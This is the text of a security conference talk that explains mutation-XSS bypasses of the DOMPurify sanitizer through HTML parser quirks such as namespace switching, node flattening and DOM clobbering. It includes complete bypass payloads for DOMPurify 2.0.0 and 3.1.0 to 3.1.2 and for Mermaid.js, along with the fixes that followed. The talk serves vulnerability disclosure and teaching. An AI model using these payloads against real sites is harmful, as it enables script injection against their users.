Playing with HTML parsing to bypass DOMPurify on default configuration

Kévin (Mizu)

Pentester at Bsecure

Bug Hunter

CTF Player @rhackgondins, @FlatNetworkOrg

@kevin_mizu | https://mizu.re

Kévin GERVOT

 

Client-Side HTML Sanitizer


A security feature or tool used to clean HTML content by removing or altering potentially dangerous elements, attributes, or scripts, thereby preventing cross-site scripting (XSS) and other code injection attacks.

 

Source: ChatGPT 🤫

 

DOMPurify


parse HTML

sanitize Elements

sanitize Attributes

serialize HTML

sanitize Shadow DOM

Highly simplified version of the DOMPurify logic

HTML string

HTML string

Why are mXSS possible?


It is possible that the output of this algorithm, if parsed with an HTML parser, will not return the original tree structure.

[...]

 

Source: HTML Specification - Serializing HTML fragments.

Why are mXSS possible?

 

<form><div></form><form></form>          (html)

What the sanitizer sees

Dom Tree

 <form>              xhtml
   <div>             xhtml
     <form>          xhtml

What the DOM sees

Dom Tree

 <form>              xhtml
   <div>             xhtml
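
The difference between the two trees can be reproduced without a browser. The sketch below is a toy model under strong assumptions: it implements only the parser's form element pointer rule (a `<form>` start tag is ignored while a form is open, and `</form>` removes the form from the stack without closing its descendants) and ignores the rest of the HTML specification. `parse` and `serialize` are hypothetical helpers, not part of any library.

```javascript
// Toy model: only the "form element pointer" rule is implemented.
// Everything else in the real HTML parser is deliberately ignored.
function parse(html) {
  const root = { tag: '#root', children: [] };
  const stack = [root];   // simplified stack of open elements
  let formPointer = null; // simplified form element pointer

  for (const [, slash, tag] of html.matchAll(/<(\/?)([a-z]+)>/g)) {
    if (slash === '') {
      // Start tag: a <form> is ignored while another form is still open.
      if (tag === 'form' && formPointer !== null) continue;
      const node = { tag, children: [] };
      stack[stack.length - 1].children.push(node);
      stack.push(node);
      if (tag === 'form') formPointer = node;
    } else if (tag === 'form') {
      // </form>: reset the pointer and remove only the form from the stack;
      // elements opened inside it stay open.
      const node = formPointer;
      formPointer = null;
      const index = stack.indexOf(node);
      if (index > 0) stack.splice(index, 1);
    } else {
      // Any other end tag: pop up to and including the matching element.
      const index = stack.map((n) => n.tag).lastIndexOf(tag);
      if (index > 0) stack.length = index;
    }
  }
  return root;
}

function serialize(node) {
  return node.children
    .map((child) => `<${child.tag}>${serialize(child)}</${child.tag}>`)
    .join('');
}

const input = '<form><div></form><form></form>';
const sanitizerView = serialize(parse(input));   // tree after the first parse
const domView = serialize(parse(sanitizerView)); // tree after parsing the serialized output
console.log(sanitizerView);
console.log(domView);
```

In this model the first parse keeps the nested `<form>`, while parsing the serialized result drops it, which is the mismatch the serialization note in the specification warns about.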

Namespaces


<style><a>                    (html)

Dom Tree

 <style>             xhtml
   <a>               text

<svg><style><a>               (html)

Dom Tree

 <svg>               svg
   <style>           svg
     <a>             svg (node)

<math><style><a>              (html)

Dom Tree

 <math>              mathml
   <style>           mathml
     <a>             mathml (node)

Integration points


List of MathML text integration points:

<mi> | <mo> | <mn> | <ms> | <mtext>

List of HTML integration points:

  <annotation-xml>

  <foreignObject>

  <desc>

  <title>

<svg><title><a>               (html)

Dom Tree

 <svg>               svg
   <title>           svg
     <a>             xhtml

We can switch from SVG to HTML!
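
The two integration point lists on this slide can be written as a lookup. This is a minimal sketch, assuming the namespace is passed as a short label (`'svg'` or `'mathml'`); `isMathMLTextIntegrationPoint` and `isHtmlIntegrationPoint` are hypothetical helpers. In the HTML specification, `<annotation-xml>` only counts when its `encoding` attribute is `text/html` or `application/xhtml+xml`, which the sketch models with an optional argument.

```javascript
const MATHML_TEXT_INTEGRATION_POINTS = new Set(['mi', 'mo', 'mn', 'ms', 'mtext']);
const SVG_HTML_INTEGRATION_POINTS = new Set(['foreignObject', 'desc', 'title']);

// True for MathML elements whose children are parsed as HTML text content.
function isMathMLTextIntegrationPoint(namespace, tagName) {
  return namespace === 'mathml' && MATHML_TEXT_INTEGRATION_POINTS.has(tagName);
}

// True for foreign elements whose children are parsed with the HTML rules.
function isHtmlIntegrationPoint(namespace, tagName, encoding = '') {
  if (namespace === 'svg') return SVG_HTML_INTEGRATION_POINTS.has(tagName);
  if (namespace === 'mathml' && tagName === 'annotation-xml') {
    const value = encoding.toLowerCase();
    return value === 'text/html' || value === 'application/xhtml+xml';
  }
  return false;
}

console.log(isHtmlIntegrationPoint('svg', 'title')); // <svg><title><a>: <a> is parsed as HTML
console.log(isHtmlIntegrationPoint('svg', 'style')); // <svg><style><a>: <a> stays in SVG
```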

DOMPurify 2.0.0 bypass


<svg></p><style><a id="</style><img src=x onerror=x>">

DOMPurify 2.0.0

 <svg>

 <p>

html

 <style>

 <a id="</style>XSS">

.innerHTML

 <svg>

svg

 <p>

xhtml

 <style><a id="</style>

 <img src=x onerror=x>"&gt;

(Found by @SecurityMB)

xhtml

xhtml

svg

svg

svg

svg

The <style> tag falls into the HTML namespace, changing its content from a node to text.

DOMPurify 3.1.0 bypass

(IcesFont)


Node flattening


The algorithm described below places no limit on the depth of the DOM tree generated, or on the length of tag names, attribute names, attribute values, Text nodes, etc.

 

 

Source: HTML Specification - Tree construction.

Node flattening


Language      Library        Nested node limit    Handling
C             libxml2        255                  Removing
JavaScript    parse5         No limit?            -
Python        html.parser    No limit?            -
Java          Jsoup          No limit?            -
Browser       DOMParser      512                  Flattening
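
The "Flattening" handling in the last row can be modeled with a toy tree builder. This is a sketch under assumptions, not browser code: `buildNested` and `maxDepth` are hypothetical helpers, the limit is a parameter rather than a value read from any engine, and the rule "once more than `limit` elements are open, attach the new element to the current node's parent" is a simplified reading of the behavior shown in this talk.

```javascript
// Toy model of depth "flattening": every tag opens a new element inside the
// previous one, but once more than `limit` elements are open the new node is
// attached to the current node's parent, so it becomes a sibling, not a child.
function buildNested(tags, limit) {
  const root = { tag: '#root', parent: null, children: [] };
  const stack = [root]; // simplified stack of open elements
  for (const tag of tags) {
    let parent = stack[stack.length - 1];
    const openElements = stack.length - 1; // do not count the synthetic root
    if (openElements > limit && parent.parent !== null) {
      parent = parent.parent; // flatten: attach next to the current node
    }
    const node = { tag, parent, children: [] };
    parent.children.push(node);
    stack.push(node); // the stack keeps growing even though the tree does not
  }
  return root;
}

// Depth of the deepest element below `node` (the synthetic root counts as 0).
function maxDepth(node) {
  let depth = 0;
  for (const child of node.children) depth = Math.max(depth, 1 + maxDepth(child));
  return depth;
}

const tree = buildNested(Array(600).fill('div'), 512);
console.log(maxDepth(tree));
```

In this model the tree stops getting deeper shortly after the limit while the stack of open elements keeps growing, so later elements end up as siblings of the nodes they were written inside.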

Node flattening

 

<div*509><svg><style>         (html)

Dom Tree

 <div*509>           xhtml
   <svg>             svg
     <style>         svg

<div*510><svg><style>         (html)

Dom Tree

 <div*510>           xhtml
   <svg>             svg
   <style>           svg

Node flattening


<a><a>

Dom Tree

 <a>

xhtml

svg

<div*509><a><svg><a>

Dom Tree

 <div*509>

 <a>

 <svg>

 <a>

html

xhtml

xhtml

svg

 <a>

xhtml

svg

html

HTML Parsing states


13.2.4 Parse state
        13.2.4.1 The insertion mode
        13.2.4.2 The stack of open elements
        13.2.4.3 The list of active formatting elements
        13.2.4.4 The element pointers
        13.2.4.5 Other parsing state flags

 

Source: HTML Specification.

HTML Insertion modes


The insertion mode is a state variable that controls the primary operation of the tree construction stage.


Initially, the insertion mode is "initial". It can change to "before html" [...] "after after frameset" during the course of the parsing [...]. The insertion mode affects how tokens are processed [...].

Source: HTML Specification - The insertion mode.

"in caption" insertion mode


The user agent must handle the token as follows:
[...]
↳ A start tag whose tag name is one of: "caption" [...]
[...]
    Pop elements from this stack until a caption element has been popped from the stack.

 

Source: HTML Specification - Parsing main incaption.
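
The quoted step can be sketched on a plain array standing in for the stack of open elements. `popUntilCaption` is a hypothetical helper. A real parser also checks that a caption is in table scope and then reprocesses the token in the "in table" insertion mode, neither of which is modeled here.

```javascript
// Stack of open elements as an array: index 0 is the first node added,
// the last index is the most recently added node.
function popUntilCaption(stack) {
  const popped = [];
  while (stack.length > 0) {
    const tagName = stack.pop();
    popped.push(tagName);
    if (tagName === 'caption') break; // stop once a caption has been popped
  }
  return popped;
}

// State when a second <caption> start tag arrives in
// <table><caption><div><caption>
const openElements = ['html', 'body', 'table', 'caption', 'div'];
const popped = popUntilCaption(openElements);
console.log(popped);       // elements closed by the nested <caption>
console.log(openElements); // what is left open afterwards
```

Every element opened inside the first `<caption>` is closed along with it, whatever it is, which is why a nested `<caption>` start tag can pull later content out of the subtree it was written in.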

Stack of open elements


The stack grows downwards; the topmost node on the stack is the first one added to the stack, and the bottommost node of the stack is the most recently added node in the stack [...].

 

Source: HTML Specification - The stack of open elements.

<table>

    <caption>

        <div>1</div>

        <div>2</div>

    </caption>

</table>

html

"in caption" insertion mode


<table>

    <caption>

        <div>1</div>

        <caption></caption>

        <div>2</div>

    </caption>

</table>

Dom Tree

 <div>2</div>        xhtml
 <table>             xhtml
   <caption>         xhtml
     <div>1</div>    xhtml
   <caption>         xhtml

"in caption" insertion mode


<table><caption>

<svg>

    <title>

        <caption></caption>

    </title>

    <style><a id="</style><img src onerror=x>"></a></style>

</svg>

</caption></table>

Dom Tree

 <table>

xhtml

 <caption>

xhtml

 <svg>

svg

 <title>

svg

 <caption>

xhtml

 <style><a id="</style>

html

 <img src onerror=x>"&gt;

xhtml

xhtml

It can even traverse namespaces!

"in caption" insertion mode


[...]

↳ Anything else

    Process the token using the rules for the "in body" insertion mode.

 

Source: HTML Specification - Parsing main inbody.

"in caption" insertion mode


<table><caption><table><caption>

Dom Tree

 <table>

xhtml

svg

svg

<div*508>

<table><caption><table><caption>

Dom Tree

 <div*508>

 <table>

 <caption>

 <table>

html

xhtml

xhtml

xhtml

 <caption>

 <caption>

 <table>

xhtml

 <caption>

xhtml

xhtml

xhtml

xhtml

html

Nested <caption> through node flattening!

DOMPurify 3.1.0 bypass


<div*506>
<table><caption>
    <svg>
      <title>
        <table><caption></caption></table>
      </title>
      <style><a id="</style><img src onerror=x>"></a></style>
    </svg>
</caption></table>

DOMPurify 3.1.0

 <div*506>

 <table>

xhtml

xhtml

 <caption>

xhtml

 <svg>

 <title>

svg

 <table>

 <caption>

xhtml

 <style>

<a id="[...]">

html

svg

xhtml

svg

svg

DOMPurify 3.1.0 bypass


.innerHTML

 <div*506>

 <img src onerror=x>"&gt;

xhtml

xhtml

 <table>

xhtml

 <caption>

xhtml

 <svg>

svg

 <title>

svg

 <table>

xhtml

 <caption>

 <style><a id="</style>

xhtml

xhtml

DOMPurify 3.1.1 bypass

(Me)

 

DOMPurify 3.1.1 fix


  1. The nested nodes limit is set to 252

currentNode.__depth = currentNode.parentNode.__depth + 1;

/* Remove an element if nested too deeply to avoid mXSS */
if (currentNode.__depth >= MAX_NESTING_DEPTH) {
  _forceRemove(currentNode);
}

Highly simplified version of the DOMPurify 3.1.1 fix
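
A minimal sketch of how such a depth counter behaves, using plain objects instead of DOM nodes. `sanitizeDepth` is a hypothetical stand-in for DOMPurify's internal iteration plus `_forceRemove`, the limit is passed as a parameter, and the recursion is only a convenience of the sketch.

```javascript
// Toy version of the depth check on plain objects ({ tag, children }).
function sanitizeDepth(root, maxNestingDepth) {
  const removed = [];
  root.__depth = 0;
  const visit = (parent) => {
    // Iterate over a copy because children may be removed while visiting.
    for (const node of [...parent.children]) {
      node.__depth = parent.__depth + 1;
      if (node.__depth >= maxNestingDepth) {
        parent.children.splice(parent.children.indexOf(node), 1);
        removed.push(node.tag);
        continue; // a removed subtree is not visited
      }
      visit(node);
    }
  };
  visit(root);
  return removed;
}

// Build <a><b><c><d></d></c></b></a> and remove anything at depth 3 or more.
const d = { tag: 'd', children: [] };
const c = { tag: 'c', children: [d] };
const b = { tag: 'b', children: [c] };
const a = { tag: 'a', children: [b] };
const root = { tag: '#root', children: [a] };
const removedTags = sanitizeDepth(root, 3);
console.log(removedTags);
```

The counter is only as reliable as the `parentNode.__depth` value it reads, which is what the following slides go after.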

DOMPurify 3.1.1 fix

 

  2. DOM Clobbering protection

elm instanceof HTMLFormElement && (
    typeof elm.__depth !== 'undefined' &&
    typeof elm.__depth !== 'number'
)

Highly simplified version of the DOMPurify 3.1.1 fix

DOM Clobbering


<div id="x">
    <form id="y">
        <input name="z">
    </form>
</div>

» x
 ←  <div [...]>

» y.z
 ←  <input [...]>

DOM Clobbering


<div>
    <form id="f">
        <input name="parentNode">
    </form>
</div>

» f.parentNode
 ←  <input name="pare[..]">

» f.parentNode.__depth
 ←  undefined

currentNode.__depth = currentNode.parentNode.__depth + 1;
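
The effect of a clobbered `parentNode` on that assignment can be checked with plain JavaScript arithmetic. In the sketch below, `clobberedParent` is a hypothetical stand-in for the `<input name="parentNode">` element that `f.parentNode` returns, and `EXAMPLE_LIMIT` is an arbitrary value chosen for illustration.

```javascript
const EXAMPLE_LIMIT = 255; // arbitrary value, for illustration only

// Stand-in for the <input> returned by the clobbered f.parentNode:
// it has no __depth property.
const clobberedParent = { name: 'parentNode' };

const depth = clobberedParent.__depth + 1; // undefined + 1
console.log(depth);                        // NaN
console.log(depth >= EXAMPLE_LIMIT);       // false: the depth check never fires
console.log(typeof depth);                 // "number": NaN still looks like a number
```

Because `NaN + 1` is still `NaN`, any node that derives its depth from this value inherits the same result.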

DOMPurify depth bypass


<div*200><form><input name="parentNode"><div*200>

DOMPurify 3.1.1

 <div*200>

html

xhtml

<form>

xhtml

<input>

xhtml

 <div*200>

xhtml


html

<div*200>
<form>

<input name="parentNode">

<div*200>
<form></form><form>

<input name="parentNode">

<div*105>


DOMPurify 3.1.0 Bypass

DOMPurify 3.1.1 bypass

DOMPurify 3.1.2 bypass

(Me)


DOMPurify 3.1.2 fix


<svg><title><a>

DOMPurify 3.1.2

 <svg>

html

svg

 <title>

svg

  1. Access .parentNode using the getter.

  2. Block SVG-to-HTML namespace switch.

const HTML_INTEGRATION_POINTS = ['foreignobject', 'annotation-xml'];

Highly simplified version of the DOMPurify 3.1.2 fix
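
The first point, reading `.parentNode` through the getter, can be illustrated by analogy in plain JavaScript. This is a sketch, not DOMPurify code: `FakeNode` is a hypothetical class, and an own property is used to imitate the shadowing that a clobbering `<input name="parentNode">` causes on a real form element.

```javascript
class FakeNode {
  #parent;
  constructor(parent) {
    this.#parent = parent;
  }
  get parentNode() {
    return this.#parent;
  }
}

const realParent = new FakeNode(null);
const form = new FakeNode(realParent);

// Simulate clobbering: an own property shadows the prototype getter.
Object.defineProperty(form, 'parentNode', { value: { name: 'parentNode' } });

// Look the getter up on the prototype once and call it on the node directly.
const getParentNode = Object.getOwnPropertyDescriptor(
  FakeNode.prototype,
  'parentNode'
).get;

console.log(form.parentNode === realParent);          // false: shadowed value
console.log(getParentNode.call(form) === realParent); // true: the getter ignores the shadow
```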

Second order DOM Clobbering


<form id="x"></form>
<input form="y" name="z">

» x.z
 ←  undefined

» x.id="y"
 ←  "y"

» y.z
 ←  <input [...] name="z">

DOMPurify attributes sanitizing


<div id="a   "></div>

DOMPurify 3.1.2

 <div id="a">

html

xhtml

  1. Takes the value
  2. Trims it
  3. Sanitizes it
  4. Overwrites it
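
The four steps can be sketched on a plain attribute map. `sanitizeAttribute` is a hypothetical helper and its "sanitize" step is a placeholder that accepts everything by default; only the order (read, trim, check, write back) is taken from the slide.

```javascript
function sanitizeAttribute(attributes, name, isAllowed = () => true) {
  const value = attributes[name];  // 1. take the value
  const trimmed = value.trim();    // 2. trim it
  if (!isAllowed(name, trimmed)) { // 3. sanitize it (placeholder check)
    delete attributes[name];
    return;
  }
  attributes[name] = trimmed;      // 4. overwrite it
}

const attributes = { id: 'a   ' };
console.log(attributes.id === 'a'); // false before sanitizing
sanitizeAttribute(attributes, 'id');
console.log(attributes.id === 'a'); // true after sanitizing
```

The value seen while the tree is being walked and the value present in the output are therefore not the same string, so an `id` that matches nothing during sanitization can match a `form="a"` reference afterwards.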

DOMPurify depth bypass


<form id="a "><div*500></div*500></form>

<input form="a" name="__depth">

DOMPurify 3.1.2

 <form id="a">

html

xhtml

 <div*500>

xhtml

 <input name="__depth">

xhtml

For some obscure reason, it doesn't work on Firefox :(

Finding new HTML mutations


... FUZZING!

"Elevator" HTML mutation


<x><y><z>

    <button>

        <z>

            <button></button>

        </z>

    </button>

    <style></style>

</z></y></x>

DOM Tree

 <x>

 <y>

xhtml

xhtml

 <z>

xhtml

 <button>

xhtml

 <z>

 <button>

 <style>

xhtml

html

xhtml

xhtml

<button> can be <dd>, <dt>, <li> or <table>

"Elevator" HTML mutation


<x><y><z>

    <button>

        <x>

            <button></button>

        </x>

    </button>

    <style></style>

</z></y></x>

DOM Tree

 <x>

 <y>

xhtml

xhtml

 <z>

xhtml

 <button>

xhtml

 <x>

 <button>

 <style>

xhtml

html

xhtml

xhtml

<button> can be <dd>, <dt>, <li> or <table>

"Elevator" HTML mutation


<svg><y><title><z>

    <button>

        <y><z>

            <button></button>

        </z></y>

    </button>

    <style></style>

</z></title></y></svg>

DOM Tree

 <svg>

 <y>

svg

 <title>

svg

svg

 <style>

html

It can even traverse namespaces!

 [Elevator]

xhtml

svg

svg

 <z>

xhtml

DOMPurify HTML/SVG tags


const COMMON_SVG_AND_HTML_ELEMENTS = addToSet({}, [
    'title',
    'style',
    'font',
    'a',
    'script',
]);

Still not working...


Can't switch from SVG namespace to HTML namespace...

Still not working...


Can't switch from SVG namespace to HTML namespace...

 

... FUZZING!

"Elevator" HTML mutation v2


<x><svg>
    <image><x>
        <title>
          <image></image>
        </title>
    </x></image>
    <style></style>
</svg></x>

DOM Tree

 <x>

 <svg>

xhtml

svg

 <image>

svg

 <x>

svg

 <image>

 <style>

xhtml

html

Browser <image> to <img> conversion works too!

 <title>

svg

svg

"Elevator" HTML mutation v2


<div*507>
<svg>
    <image>
        <title>
            <svg>
                <image></image>
            </svg>
        </title>
    </image>
</svg>

DOM Tree

 <div*507>

 <svg>

xhtml

svg

 <image>

svg

 <title>

svg

 <image>

html

svg

 <svg>

svg

Even if we use HTML integration points, we do not switch to HTML :)


DOMPurify 3.1.2 bypass

<form id="x ">
<div*504>
<a><svg>
  <image>
    <a><title>
      <svg><image></image></svg>
    </title></a>
  </image>
  <style><a id="</style><img src=x onerror=x>"></a></style>
</svg></a>
<input form="x" name="__depth">

DOMPurify 3.1.2

 <form id="x">

 <div*504>

xhtml

xhtml

 <a>

xhtml

 <svg>

xhtml

 <image>

svg

 <a>

svg

 <title>

 <svg>

 <image>

html

 <style>

 <a>

 <input name="__depth">

svg

svg

svg

svg

svg

xhtml


DOMPurify 3.1.2 bypass

.innerHTML

 <form id="x">

 <div*504>

xhtml

xhtml

 <a>

xhtml

 <svg>

xhtml

 <image>

svg

 <a>

svg

 <title>

 <svg>

 <img>

 <style><a id="</style>

 <img src onerror=x>"&gt;

 <input name="__depth">

svg

svg

xhtml

xhtml

xhtml

xhtml

DOMPurify Triple HTML Parsing bypass
(hash_kitten, ryotkak and me)


Mermaid.js


function sanitizeMore(txt) {
  return DOMPurify.sanitize(txt);
}

text = DOMPurify.sanitize(sanitizeMore(text, config), config);

Highly simplified version of the Mermaid.js sanitizing process.

Triple HTML parsing bypass


${"<form><h1></form><table><form></form></table></form></table></h1></form>".repeat(510)}
<math>
    <mi>
        <style><!--</style>
        <style id="--></style></mi></math><img src=x onerror=x>"></style>
    </mi>
</math>

DOMPurify 3.1.2

 <form>

 <h1>

xhtml

 <table>

 <form>

 "mXSS payload"

mathml

 <math>

mathml

html

xhtml

xhtml

xhtml

x510

Depth of 4

Triple HTML parsing bypass


.innerHTML

 <form>

 <h1>

xhtml

 <table>

 <form>

 <table>

 <h1>

xhtml

xhtml

xhtml

 <math>

 <mi>

New depth = number of patterns = 510

mathml

 <style><!--</style>

 <style id="-->XSS"></style>

xhtml

xhtml

 [...]

xhtml

mathml

xhtml

xhtml

Triple HTML parsing bypass


.innerHTML

 <form>

 <h1>

xhtml

 <table>

 <h1>

 <table>

xhtml

xhtml

xhtml

 <math>

 <mi>

mathml

 <style><!--[...]--></style>

 <img src=x onerror=x>"&gt;

xhtml

xhtml

xhtml

 [...]

mathml

mathml


What's next?


DOMPurify 3.1.3 fix


if (regExpTest(/((--!?|])>)|<\/(style|title)/i, value)) {
	_removeAttribute(name, currentNode);
	continue;
}

Highly simplified version of the DOMPurify 3.1.3 fix
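
The regular expression from the snippet above can be exercised on its own against a few attribute values. `isDangerousAttributeValue` is a hypothetical wrapper added for this sketch; the pattern itself is copied from the slide.

```javascript
const MXSS_ATTRIBUTE_PATTERN = /((--!?|])>)|<\/(style|title)/i;

// True when the attribute value contains a comment or CDATA terminator,
// or a closing </style> or </title> tag.
function isDangerousAttributeValue(value) {
  return MXSS_ATTRIBUTE_PATTERN.test(value);
}

const samples = ['-->', '--!>', ']>', '</style><img src=x onerror=x>', '</TITLE>', 'a', '--'];
for (const value of samples) {
  console.log(JSON.stringify(value), isDangerousAttributeValue(value));
}
```

Only the last two samples pass the check; every other value would cause the attribute to be removed.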

<div id="-->"></div>

DOMPurify 3.1.3

 <div>

html

xhtml

Conclusion
